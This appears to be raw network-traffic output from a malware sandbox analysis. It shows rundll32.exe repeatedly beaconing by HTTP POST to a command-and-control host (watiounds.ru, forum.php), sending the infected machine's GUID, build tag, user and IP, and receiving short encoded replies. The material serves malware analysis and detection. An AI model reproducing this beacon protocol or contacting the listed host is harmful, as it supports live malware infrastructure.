                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          362192.168.2.224952795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:08.676376104 CEST440OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:08.798355103 CEST440INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          363192.168.2.224952895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:09.125950098 CEST441OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:09.247762918 CEST442INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCGTXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          364192.168.2.224952995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:09.569463015 CEST442OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:09.693094969 CEST443INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 54 47 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBTGYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          365192.168.2.224953095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:10.003714085 CEST444OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:10.125227928 CEST444INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZBYAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          366192.168.2.224953195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:10.442394018 CEST445OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:10.563672066 CEST445INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFKPUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          367192.168.2.224953295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:10.885448933 CEST446OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:11.014106989 CEST446INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTNMGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          368192.168.2.224953395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:11.340051889 CEST447OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:11.469918013 CEST447INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNZAMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          369192.168.2.224953495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:11.781888008 CEST448OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:11.907711983 CEST448INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVNMEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          37192.168.2.224920295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:40.102360010 CEST76OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:40.231110096 CEST77INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 54 47 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKTGPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          370192.168.2.224953595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:12.216630936 CEST449OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:12.340862989 CEST449INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 47 54 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYGTBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          371192.168.2.224953695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:12.656728029 CEST450OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:12.782521963 CEST451INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 54 47 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTTGGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          372192.168.2.224953795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:13.111071110 CEST451OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:13.241555929 CEST452INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4a 51 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCJQXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          373192.168.2.224953895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:13.566484928 CEST452OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:13.690121889 CEST453INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 42 59 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNBYMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          374192.168.2.224953995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:14.020216942 CEST454OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:14.143364906 CEST454INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 59 42 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVYBEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          375192.168.2.224954095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:14.466567993 CEST455OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:14.594840050 CEST455INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGQJTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          376192.168.2.224954195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:14.916862965 CEST456OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:15.039254904 CEST456INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 42 59 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJBYQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          377192.168.2.224954295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:15.359204054 CEST457OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:15.485290051 CEST457INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMBYNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          378192.168.2.224954395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:15.810569048 CEST458OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
